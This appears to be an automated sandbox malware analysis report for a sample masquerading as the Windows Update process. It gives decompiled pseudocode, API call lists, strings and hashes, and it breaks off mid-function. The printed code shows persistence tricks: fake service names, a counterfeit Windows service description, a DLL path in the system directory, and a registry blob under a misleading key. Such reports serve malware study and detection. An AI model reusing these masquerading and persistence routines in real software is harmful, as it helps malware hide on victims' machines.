                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: AdaptersInfoStartup
                                                • String ID: %02X:%02X:%02X:%02X:%02X:%02X$10:00:00:00:00:01
                                                • API String ID: 2017509081-2151411463
                                                • Opcode ID: e7eb4f0af683bc5ccaadd38f052d17114ab498cf190a78f8c4f124b038351f24
                                                • Instruction ID: 6bd4900ad51558a78dfa0f14b7daa819baba4ad8cab90c909a4918ca1baa7f57
                                                • Opcode Fuzzy Hash: e7eb4f0af683bc5ccaadd38f052d17114ab498cf190a78f8c4f124b038351f24
                                                • Instruction Fuzzy Hash: 4F210BB19242985EEF25CB21982DFF53FE89F06315F8800FEFD4C57082DA745AA88B55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025C90E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0025C90E(int _a4) {
				void* _t14;
				void* _t16;

				if(E0025D96B(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E0025C993(_t14, _a4);
				ExitProcess(_a4);
			}





                                                0x0025c91a
                                                0x0025c936
                                                0x0025c936
                                                0x0025c93f
                                                0x0025c948

                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000003,?,0025C8E4,00000003,0026F9B8,0000000C,0025CA3B,00000003,00000002,00000000,?,0025D3BE,00000003), ref: 0025C92F
                                                • TerminateProcess.KERNEL32(00000000,?,0025C8E4,00000003,0026F9B8,0000000C,0025CA3B,00000003,00000002,00000000,?,0025D3BE,00000003), ref: 0025C936
                                                • ExitProcess.KERNEL32 ref: 0025C948
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 3c507b5720e5637e77bff7d9f17957df48c873568e385aac2aaa1b5115a34039
                                                • Instruction ID: 740480065c62ff42b8b7f97bdf31e05a87a3ad9e0ec7aa8993577a2a6cdab9fc
                                                • Opcode Fuzzy Hash: 3c507b5720e5637e77bff7d9f17957df48c873568e385aac2aaa1b5115a34039
                                                • Instruction Fuzzy Hash: 77E04631020649AFCF116F20EC0CAA83B29EB12742B608054FC099B122DF76DDA6CB84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00257AAE Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00257AAE() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00257ABA); // executed
				return _t1;
			}




                                                0x00257ab3
                                                0x00257ab9

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00007ABA,0025739E), ref: 00257AB3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: a8309b6382e0a48ee82b5042871e8f081551097f36d110dc58dcb313403299f6
                                                • Instruction ID: 82eb52c0154fa8f1a399ceda60a1e87cff3870f89cf6aff5e55707a6b09d15f7
                                                • Opcode Fuzzy Hash: a8309b6382e0a48ee82b5042871e8f081551097f36d110dc58dcb313403299f6
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00255180 Relevance: 49.4, APIs: 14, Strings: 14, Instructions: 441registryservicefileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 38 255180-2551b4 39 2551b6-2551c2 38->39 40 2558a9 39->40 41 2551c8-2551d9 call 254a10 39->41 43 2558ab-2558c6 call 257097 40->43 46 255266-2552ab call 254e30 call 257f02 41->46 47 2551df-2551ff 41->47 57 2552ad-2552b5 call 254cf0 46->57 58 2552ba-255357 call 255110 call 254e30 call 257f02 46->58 50 255200-255245 call 254e30 call 257f02 47->50 62 255254-255264 call 255110 50->62 63 255247-25524f call 254cf0 50->63 57->58 72 255366-2553fe call 255110 call 254e30 call 257f02 58->72 73 255359-255361 call 254cf0 58->73 62->46 62->50 63->62 81 255400-255408 call 254cf0 72->81 82 25540d-2554a5 call 255110 call 254e30 call 257f02 72->82 73->72 81->82 90 2554b4-255597 call 255110 call 2596c0 * 2 call 253d30 * 2 OpenSCManagerA 82->90 91 2554a7-2554af call 254cf0 82->91 103 2555f9-25565e call 2596c0 GetSystemDirectoryA call 2596c0 90->103 104 255599-2555ad OpenServiceA 90->104 91->90 112 255660-2556a5 call 254e30 call 257f02 103->112 105 2555af-2555b6 CloseServiceHandle 104->105 106 2555b8-2555e4 QueryServiceStatusEx CloseServiceHandle * 2 104->106 105->103 106->103 108 2555e6-2555f3 106->108 108->39 108->103 117 2556b4-2556ee call 255110 112->117 118 2556a7-2556af call 254cf0 112->118 117->112 122 2556f4-255780 call 2596c0 * 2 call 253d30 * 2 117->122 118->117 131 255782-25578d 122->131 131->131 132 25578f-25579b 131->132 133 2557a1-2557ac 132->133 133->133 134 2557ae-2557ba 133->134 135 2557c0-2557cb 134->135 135->135 136 2557cd-2557df 135->136 137 2557e0-2557eb 136->137 137->137 138 2557ed-25580d DeleteFileA CreateFileA 137->138 139 255821-25587d call 253d30 RegCreateKeyExA 138->139 140 25580f-25581c CloseHandle 138->140 139->40 143 25587f-2558a1 RegSetValueExA 139->143 140->39 144 2558c7-2558cf RegCloseKey 143->144 145 2558a3 RegCloseKey 143->145 144->43 145->40
                                                C-Code - Quality: 79%
                                                			E00255180(char* __ebx, int __ecx, void* __edi) {
				int _v8;
				char _v16;
				signed int _v20;
				char _v84;
				char _v212;
				char _v340;
				char _v604;
				char _v868;
				char _v1132;
				intOrPtr _v1136;
				int _v1140;
				char _v1156;
				intOrPtr _v1164;
				char _v1168;
				void* _v1172;
				char _v1173;
				char _v1174;
				char _v1175;
				char _v1176;
				char _v1177;
				char _v1178;
				int _v1184;
				signed int _v1188;
				intOrPtr _v1192;
				int _v1196;
				intOrPtr _v1200;
				char _v1204;
				int _v1208;
				intOrPtr _v1212;
				char _v1216;
				int _v1220;
				intOrPtr _v1224;
				char _v1228;
				int _v1232;
				intOrPtr _v1236;
				char _v1240;
				int _v1244;
				intOrPtr _v1248;
				char _v1252;
				int _v1256;
				intOrPtr _v1260;
				char _v1264;
				char _v1268;
				void* __esi;
				void* __ebp;
				signed int _t165;
				signed int _t166;
				intOrPtr _t174;
				void* _t176;
				intOrPtr _t181;
				void* _t184;
				intOrPtr _t187;
				void* _t190;
				void* _t208;
				char _t215;
				char _t239;
				char _t242;
				char _t244;
				char _t247;
				void* _t249;
				int _t255;
				signed int _t256;
				signed int _t266;
				signed int _t287;
				signed int _t289;
				intOrPtr* _t305;
				intOrPtr* _t306;
				intOrPtr* _t307;
				intOrPtr* _t308;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				signed int _t321;
				void* _t323;
				void* _t325;
				void* _t326;
				signed int _t327;
				int _t330;
				CHAR* _t331;
				void* _t332;
				signed int _t334;
				void* _t335;
				void* _t336;
				void* _t341;
				void* _t352;
				void* _t354;
				void* _t356;

				_t319 = __edi;
				_t285 = __ebx;
				_push(0xffffffff);
				_push(E002680A2);
				_push( *[fs:0x0]);
				_t336 = _t335 - 0x4e4;
				_t165 =  *0x271004; // 0x80aab37c
				_t166 = _t165 ^ _t334;
				_v20 = _t166;
				_push(__ebx);
				_push(__edi);
				_push(_t166);
				 *[fs:0x0] =  &_v16;
				_v1184 = __ecx;
				_t289 = 0;
				while(1) {
					_v1192 = _t289 + 1;
					_t346 = _t289 - 0xf;
					if(_t289 > 0xf) {
						break;
					}
					_t295 = 0x14;
					_t326 = E00254A10(_t285, 0x14, 0x64, _t319, _t346);
					_t347 = _t326;
					if(_t326 != 0) {
						_v1200 = 0x20;
						_v1204 =  &_v1173;
						_v1196 = 0xffffffff;
						do {
							_push(0);
							_v1136 = 0xf;
							_v1140 = 0;
							_v1156 = 0;
							E00254E30(_t285,  &_v1156, _t295);
							_v8 = 0;
							E00257F02( &_v1156, _t347);
							_v8 = 0xffffffff;
							_t281 = _v1136;
							if(_v1136 >= 0x10) {
								E00254CF0(_t285, 0x64, _t319, _v1156, _t281 + 1);
							}
							_t295 =  &_v1204;
							E00255110( &_v1204, 0x64);
							_t326 = _t326 - 1;
							_t350 = _t326;
						} while (_t326 != 0);
					}
					_push(0);
					_v1136 = 0xf;
					_v1140 = 0;
					_v1156 = 0;
					E00254E30(_t285,  &_v1156, _t295);
					_v8 = 1;
					E00257F02( &_v1156, _t350);
					_v8 = 0xffffffff;
					_t174 = _v1136;
					if(_t174 >= 0x10) {
						_t352 = _t174 + 1;
						E00254CF0(_t285, 0x64, _t319, _v1156, _t174 + 1);
					}
					_v1136 = 0xf;
					_v1140 = 0;
					_v1156 = 0;
					_v1216 =  &_v1174;
					_v1212 = 0x20;
					_v1208 = 0xffffffff;
					_t176 = E00255110( &_v1216, 5);
					_v1136 = 0xf;
					_push(0);
					_v1140 = 0;
					_v1172 = _t176 + 0xffffffff00000000;
					_v1156 = 0;
					E00254E30(_t285,  &_v1156,  &_v1216);
					_v8 = 2;
					E00257F02( &_v1156, _t352);
					_v8 = 0xffffffff;
					_t181 = _v1136;
					if(_t181 >= 0x10) {
						_t354 = _t181 + 1;
						E00254CF0(_t285, 0x64, _t319, _v1156, _t181 + 1);
					}
					_v1136 = 0xf;
					_v1140 = 0;
					_v1156 = 0;
					_v1228 =  &_v1175;
					_v1224 = 0x20;
					_v1220 = 0xffffffff;
					_t184 = E00255110( &_v1228, 5) + 0x80000000;
					_v1136 = 0xf;
					_push(0);
					_v1140 = 0;
					_t55 = _t184 - 0x80000000; // -4294967296
					_t321 = _t55;
					_v1156 = 0;
					E00254E30(_t285,  &_v1156,  &_v1228);
					_v8 = 3;
					E00257F02( &_v1156, _t354);
					_v8 = 0xffffffff;
					_t187 = _v1136;
					if(_t187 >= 0x10) {
						_t356 = _t187 + 1;
						E00254CF0(_t285, 0x64, _t321, _v1156, _t187 + 1);
					}
					_v1136 = 0xf;
					_v1140 = 0;
					_v1156 = 0;
					_v1240 =  &_v1176;
					_v1236 = 0x20;
					_v1232 = 0xffffffff;
					_t190 = E00255110( &_v1240, 5) + 0x80000000;
					_v1136 = 0xf;
					_push(0);
					_v1140 = 0;
					_t72 = _t190 - 0x80000000; // -4294967296
					_t327 = _t72;
					_v1156 = 0;
					E00254E30(_t285,  &_v1156,  &_v1240);
					_v8 = 4;
					E00257F02( &_v1156, _t356);
					_v8 = 0xffffffff;
					_t193 = _v1136;
					if(_v1136 >= 0x10) {
						E00254CF0(_t285, 0x64, _t321, _v1156, _t193 + 1);
					}
					_v1136 = 0xf;
					_t303 =  &_v1252;
					_v1140 = 0;
					_v1156 = 0;
					_v1252 =  &_v1177;
					_v1248 = 0x20;
					_v1244 = 0xffffffff;
					_v1188 = E00255110( &_v1252, 7) + 0xffffffff00000000;
					E002596C0(_t321,  &_v212, 0, 0x80);
					E002596C0(_t321,  &_v340, 0, 0x80);
					_t90 = (_t327 << 7) + "Event"; // -4292399432
					_t287 = _t90;
					_push(_t287);
					_t323 = "NetBIOS" + (_t321 << 7);
					_push(_t323);
					E00253D30( &_v212, "%s%s%s", "Remote" + (_v1172 << 7));
					_push(_t287);
					_push(_t323);
					E00253D30( &_v340, "%s %s %s", "Remote" + (_v1172 << 7));
					_t336 = _t336 + 0x40;
					_t208 = OpenSCManagerA(0, 0, 4); // executed
					_t319 = _t208;
					if(_t319 == 0) {
						L20:
						E002596C0(_t319,  &_v604, 0, 0x104);
						GetSystemDirectoryA( &_v604, 0x104);
						E002596C0(_t319,  &_v84, 0, 0x40);
						_t215 = "msvc"; // 0x6376736d
						_t341 = _t336 + 0x18;
						_v84 = _t215;
						_t330 = 4;
						_v1260 = 0x20;
						_v1264 =  &_v1178;
						_v1256 = 0xffffffff;
						do {
							_push(0);
							_v1136 = 0xf;
							_v1140 = 0;
							_v1156 = 0;
							E00254E30(_t287,  &_v1156, _t303);
							_v8 = 5;
							E00257F02( &_v1156, _t360);
							_v8 = 0xffffffff;
							_t219 = _v1136;
							if(_v1136 >= 0x10) {
								E00254CF0(_t287, 0x64, _t319, _v1156, _t219 + 1);
							}
							_t303 =  &_v1264;
							_v1136 = 0xf;
							_v1140 = 0;
							_v1156 = 0;
							 *((char*)(_t334 + _t330 - 0x50)) = E00255110( &_v1264, 0x1a) + 0xffffffff00000061;
							_t330 = _t330 + 1;
						} while (_t330 < 7);
						E002596C0(_t319,  &_v868, 0, 0x104);
						E002596C0(_t319,  &_v1132, 0, 0x104);
						_push( &_v212);
						E00253D30( &_v868, "%s\\%s.dll",  &_v604);
						_push("xsl" + (_v1188 << 4));
						_push( &_v84);
						E00253D30( &_v1132, "%s\\%s.%s",  &_v604);
						_t285 = _v1184;
						_t305 =  &_v868;
						_t336 = _t341 + 0x3c;
						_t331 =  &(_t285[0x40]);
						_t312 = _t331 - _t305;
						do {
							_t239 =  *_t305;
							_t305 = _t305 + 1;
							 *((char*)(_t305 + _t312 - 1)) = _t239;
						} while (_t239 != 0);
						_t306 =  &_v1132;
						_t314 = _t285 - _t306 + 0xc0;
						do {
							_t242 =  *_t306;
							_t306 = _t306 + 1;
							 *((char*)(_t306 + _t314 - 1)) = _t242;
						} while (_t242 != 0);
						_t307 =  &_v212;
						_t316 = _t285 - _t307;
						asm("o16 nop [eax+eax]");
						do {
							_t244 =  *_t307;
							_t307 = _t307 + 1;
							 *((char*)(_t307 + _t316 - 1)) = _t244;
						} while (_t244 != 0);
						_t308 =  &_v340;
						_t318 = _t285 - _t308 + 0x140;
						do {
							_t247 =  *_t308;
							_t308 = _t308 + 1;
							 *((char*)(_t308 + _t318 - 1)) = _t247;
						} while (_t247 != 0);
						DeleteFileA(_t331); // executed
						_t249 = CreateFileA(_t331, 0x80000000, 1, 0, 3, 0, 0); // executed
						if(_t249 == 0xffffffff) {
							E00253D30( &(_t285[0x180]), "Provides management services: %s, which confirms the signatures of Windows files and allows new programs to be installed. If this service is stopped, these management services will not function properly. If this service is disabled, any services that explicitly depend on it will fail to start.",  &(_t285[0x140]));
							_v1172 = 0;
							_v1184 = 1;
							_t255 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0, 0, 0, 0xf003f, 0,  &_v1172,  &_v1184); // executed
							__eflags = _t255;
							if(_t255 != 0) {
								break;
							} else {
								_t256 = RegSetValueExA(_v1172, "LastBackup", _t255, 3, _t285, 0x380); // executed
								_push(_v1172);
								__eflags = _t256;
								if(_t256 == 0) {
									RegCloseKey();
								} else {
									RegCloseKey();
									break;
								}
							}
						} else {
							CloseHandle(_t249);
							_t289 = _v1192;
							continue;
						}
					} else {
						_t332 = OpenServiceA(_t319,  &_v212, 4);
						_t360 = _t332;
						if(_t332 != 0) {
							_t266 =  &_v1168;
							__imp__QueryServiceStatusEx(_t332, 0, _t266, 0x24,  &_v1268);
							__eflags = _t266;
							_t287 = _t287 & 0xffffff00 | _t266 != 0x00000000;
							CloseServiceHandle(_t332);
							CloseServiceHandle(_t319);
							__eflags = _t287;
							if(_t287 == 0) {
								goto L20;
							} else {
								__eflags = _v1164 - 4;
								_t289 = _v1192;
								if(__eflags == 0) {
									continue;
								} else {
									goto L20;
								}
							}
						} else {
							CloseServiceHandle(_t319);
							goto L20;
						}
					}
					L38:
					 *[fs:0x0] = _v16;
					_pop(_t325);
					__eflags = _v20 ^ _t334;
					return E00257097(_v20 ^ _t334, _t325);
				}
				__eflags = 0;
				goto L38;
			}



























































































                                                0x00255180
                                                0x00255180
                                                0x00255183
                                                0x00255185
                                                0x00255190
                                                0x00255191
                                                0x00255197
                                                0x0025519c
                                                0x0025519e
                                                0x002551a1
                                                0x002551a3
                                                0x002551a4
                                                0x002551a8
                                                0x002551ae
                                                0x002551b4
                                                0x002551b6
                                                0x002551b9
                                                0x002551bf
                                                0x002551c2
                                                0x00000000
                                                0x00000000
                                                0x002551cd
                                                0x002551d5
                                                0x002551d7
                                                0x002551d9
                                                0x002551e5
                                                0x002551ef
                                                0x002551f5
                                                0x00255200
                                                0x00255200
                                                0x00255209
                                                0x00255213
                                                0x0025521d
                                                0x00255224
                                                0x00255229
                                                0x00255230
                                                0x00255235
                                                0x0025523c
                                                0x00255245
                                                0x0025524f
                                                0x0025524f
                                                0x00255256
                                                0x0025525c
                                                0x00255261
                                                0x00255261
                                                0x00255261
                                                0x00255200
                                                0x00255266
                                                0x0025526f
                                                0x00255279
                                                0x00255283
                                                0x0025528a
                                                0x0025528f
                                                0x00255296
                                                0x0025529b
                                                0x002552a2
                                                0x002552ab
                                                0x002552ad
                                                0x002552b5
                                                0x002552b5
                                                0x002552c0
                                                0x002552d2
                                                0x002552dc
                                                0x002552e3
                                                0x002552e9
                                                0x002552f3
                                                0x002552fd
                                                0x00255307
                                                0x00255311
                                                0x00255318
                                                0x00255329
                                                0x0025532f
                                                0x00255336
                                                0x0025533b
                                                0x00255342
                                                0x00255347
                                                0x0025534e
                                                0x00255357
                                                0x00255359
                                                0x00255361
                                                0x00255361
                                                0x0025536c
                                                0x0025537e
                                                0x00255388
                                                0x0025538f
                                                0x00255395
                                                0x0025539f
                                                0x002553ae
                                                0x002553b3
                                                0x002553bd
                                                0x002553c6
                                                0x002553d0
                                                0x002553d0
                                                0x002553d6
                                                0x002553dd
                                                0x002553e2
                                                0x002553e9
                                                0x002553ee
                                                0x002553f5
                                                0x002553fe
                                                0x00255400
                                                0x00255408
                                                0x00255408
                                                0x00255413
                                                0x00255425
                                                0x0025542f
                                                0x00255436
                                                0x0025543c
                                                0x00255446
                                                0x00255455
                                                0x0025545a
                                                0x00255464
                                                0x0025546d
                                                0x00255477
                                                0x00255477
                                                0x0025547d
                                                0x00255484
                                                0x00255489
                                                0x00255490
                                                0x00255495
                                                0x0025549c
                                                0x002554a5
                                                0x002554af
                                                0x002554af
                                                0x002554ba
                                                0x002554c6
                                                0x002554cc
                                                0x002554d6
                                                0x002554dd
                                                0x002554e3
                                                0x002554ed
                                                0x0025550b
                                                0x0025551a
                                                0x00255530
                                                0x00255547
                                                0x00255547
                                                0x0025554d
                                                0x0025554e
                                                0x0025555a
                                                0x00255568
                                                0x00255576
                                                0x00255577
                                                0x0025557f
                                                0x00255584
                                                0x0025558d
                                                0x00255593
                                                0x00255597
                                                0x002555f9
                                                0x00255607
                                                0x0025561b
                                                0x00255629
                                                0x0025562e
                                                0x00255633
                                                0x00255636
                                                0x00255639
                                                0x00255644
                                                0x0025564e
                                                0x00255654
                                                0x00255660
                                                0x00255660
                                                0x00255669
                                                0x00255673
                                                0x0025567d
                                                0x00255684
                                                0x00255689
                                                0x00255690
                                                0x00255695
                                                0x0025569c
                                                0x002556a5
                                                0x002556af
                                                0x002556af
                                                0x002556b6
                                                0x002556bc
                                                0x002556c6
                                                0x002556d0
                                                0x002556e6
                                                0x002556ea
                                                0x002556eb
                                                0x00255702
                                                0x00255718
                                                0x00255726
                                                0x0025573a
                                                0x0025574d
                                                0x00255751
                                                0x00255765
                                                0x0025576a
                                                0x00255770
                                                0x00255778
                                                0x0025577b
                                                0x00255780
                                                0x00255782
                                                0x00255782
                                                0x00255784
                                                0x00255787
                                                0x0025578b
                                                0x0025578f
                                                0x0025579b
                                                0x002557a1
                                                0x002557a1
                                                0x002557a3
                                                0x002557a6
                                                0x002557aa
                                                0x002557ae
                                                0x002557b8
                                                0x002557ba
                                                0x002557c0
                                                0x002557c0
                                                0x002557c2
                                                0x002557c5
                                                0x002557c9
                                                0x002557cd
                                                0x002557d9
                                                0x002557e0
                                                0x002557e0
                                                0x002557e2
                                                0x002557e5
                                                0x002557e9
                                                0x002557ee
                                                0x00255804
                                                0x0025580d
                                                0x00255834
                                                0x0025583c
                                                0x0025584c
                                                0x00255875
                                                0x0025587b
                                                0x0025587d
                                                0x00000000
                                                0x0025587f
                                                0x00255893
                                                0x00255899
                                                0x0025589f
                                                0x002558a1
                                                0x002558c7
                                                0x002558a3
                                                0x002558a3
                                                0x00000000
                                                0x002558a3
                                                0x002558a1
                                                0x0025580f
                                                0x00255810
                                                0x00255816
                                                0x00000000
                                                0x00255816
                                                0x00255599
                                                0x002555a9
                                                0x002555ab
                                                0x002555ad
                                                0x002555c1
                                                0x002555cb
                                                0x002555d1
                                                0x002555da
                                                0x002555dd
                                                0x002555e0
                                                0x002555e2
                                                0x002555e4
                                                0x00000000
                                                0x002555e6
                                                0x002555e6
                                                0x002555ed
                                                0x002555f3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002555f3
                                                0x002555af
                                                0x002555b0
                                                0x00000000
                                                0x002555b0
                                                0x002555ad
                                                0x002558ab
                                                0x002558ae
                                                0x002558b7
                                                0x002558bc
                                                0x002558c6
                                                0x002558c6
                                                0x002558a9
                                                0x00000000

                                                APIs
                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 0025558D
                                                • OpenServiceA.ADVAPI32(00000000,?,00000004), ref: 002555A3
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 002555B0
                                                • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?), ref: 002555CB
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 002555DD
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 002555E0
                                                • GetSystemDirectoryA.KERNEL32 ref: 0025561B
                                                • DeleteFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,0000001A,?,00000000), ref: 002557EE
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00255804
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000001A,?,00000000), ref: 00255810
                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00000000,00000000,000F003F,00000000,00000000,?), ref: 00255875
                                                • RegSetValueExA.KERNELBASE(00000000,LastBackup,00000000,00000003,?,00000380), ref: 00255893
                                                • RegCloseKey.ADVAPI32(00000000), ref: 002558A3
                                                • RegCloseKey.ADVAPI32(00000000), ref: 002558C7
                                                Strings
                                                • %s%s%s, xrefs: 00255562
                                                • %s\%s.%s, xrefs: 0025575F
                                                • , xrefs: 00255395
                                                • msvc, xrefs: 0025562E
                                                • , xrefs: 00255644
                                                • Provides management services: %s, which confirms the signatures of Windows files and allows new programs to be installed. If this service is stopped, these management services will not function properly. If this service is disabled, any services that explicitl, xrefs: 0025582E
                                                • %s %s %s, xrefs: 00255579
                                                • Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location, xrefs: 0025586B
                                                • , xrefs: 002554E3
                                                • LastBackup, xrefs: 00255888
                                                • , xrefs: 002551E5
                                                • , xrefs: 002552E9
                                                • , xrefs: 0025543C
                                                • %s\%s.dll, xrefs: 00255734
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Close$Service$Handle$CreateFileOpen$DeleteDirectoryManagerQueryStatusSystemValue
                                                • String ID: $ $ $ $ $ $%s %s %s$%s%s%s$%s\%s.%s$%s\%s.dll$LastBackup$Provides management services: %s, which confirms the signatures of Windows files and allows new programs to be installed. If this service is stopped, these management services will not function properly. If this service is disabled, any services that explicitl$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location$msvc
                                                • API String ID: 468037261-3896663686
                                                • Opcode ID: 3da782eaeb7058139acba702b907d9570612e0d6a2020561b085d6e850e7ab9a
                                                • Instruction ID: 400861fb4dbd197eeec58dff901e5f3e5cb92e5f4f6ced61e52c7431ec9b960e
                                                • Opcode Fuzzy Hash: 3da782eaeb7058139acba702b907d9570612e0d6a2020561b085d6e850e7ab9a
                                                • Instruction Fuzzy Hash: 131290F19202289AEB21DF54CC49BEDB778BB01309F1042D9EA58A72C1DB755A8DCF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00256960 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 160synchronizationsleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 57%
                                                			E00256960(void* __ebx, void* __edi) {
				signed int _v8;
				char _v276;
				struct _SECURITY_ATTRIBUTES* _v280;
				char _v308;
				short _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				char _v336;
				char _v852;
				char _v916;
				char _v1044;
				char _v1172;
				char _v1236;
				char _v1240;
				char _v1244;
				void* __esi;
				signed int _t38;
				void* _t42;
				signed int _t44;
				intOrPtr _t49;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t62;
				void* _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				char* _t81;
				intOrPtr* _t87;
				void* _t94;
				void* _t96;
				void* _t100;
				signed int _t101;
				signed int _t103;
				signed int _t104;

				_t75 = __ebx;
				_t103 = (_t101 & 0xfffffff8) - 0x4d8;
				_t38 =  *0x271004; // 0x80aab37c
				_v8 = _t38 ^ _t103;
				_push(__edi); // executed
				FreeConsole(); // executed
				asm("movaps xmm0, [0x26eee0]");
				_t99 = 0;
				_v320 = 0x44372d30;
				asm("movups [esp+0x3a0], xmm0");
				_v316 = 0x4e393837;
				_v312 = 0x7d;
				_t42 = CreateMutexA(0, 1,  &_v336); // executed
				_t96 = _t42;
				_t44 = GetLastError() & 0xffffff00 | _t43 == 0x000000b7;
				if(_t96 == 0) {
					L3:
					_t99 = 0x16;
					goto L4;
				} else {
					if(_t44 == 0) {
						_t49 = E002568A0(_t96, 0, __eflags); // executed
						__eflags = _t49;
						if(_t49 != 0) {
							E002596C0(_t96,  &_v276, 0, 0x104);
							GetModuleFileNameA(0,  &_v276, 0x104);
							_v1244 = 0;
							_v1240 = 0;
							_t55 = E00256610(__ebx,  &_v276,  &_v1240, _t96,  &_v1244); // executed
							_t103 = _t103 + 0x10;
							__eflags = _t55;
							if(_t55 != 0) {
								E002596C0(_t96,  &_v1236, 0, 0x380);
								_t103 = _t103 + 0xc;
								_t58 = E002558E0(__ebx,  &_v1236, _t96, __eflags); // executed
								__eflags = _t58;
								if(_t58 != 0) {
									_t59 = E00255C40( &_v1044,  &_v1172);
									__eflags = _t59;
									if(_t59 != 0) {
										_t81 =  &_v1044;
										_t60 = E00256240(_t81, _v1240, _v1244); // executed
										_t103 = _t103 + 4;
										__eflags = _t60;
										if(__eflags != 0) {
											_push(_t81);
											_t62 = E00255DA0(__ebx,  &_v1044,  &_v1172, __eflags,  &_v1236); // executed
											_t103 = _t103 + 8;
											__eflags = _t62;
											if(_t62 != 0) {
												E00255B10( &_v1044, _t96); // executed
												E00255B10( &_v1172, _t96); // executed
												E00257040( &_v1236, __eflags,  &_v916,  &_v852); // executed
												_t103 = _t103 + 8;
												Sleep(0x1388); // executed
												_t68 = E00254AE0(_t75,  &_v1236, _t96);
												__eflags = _t68 - 4;
												if(_t68 == 4) {
													asm("xorps xmm0, xmm0");
													_v308 = 0x435049;
													_t34 =  &_v308; // 0x435049
													_t87 = _t34;
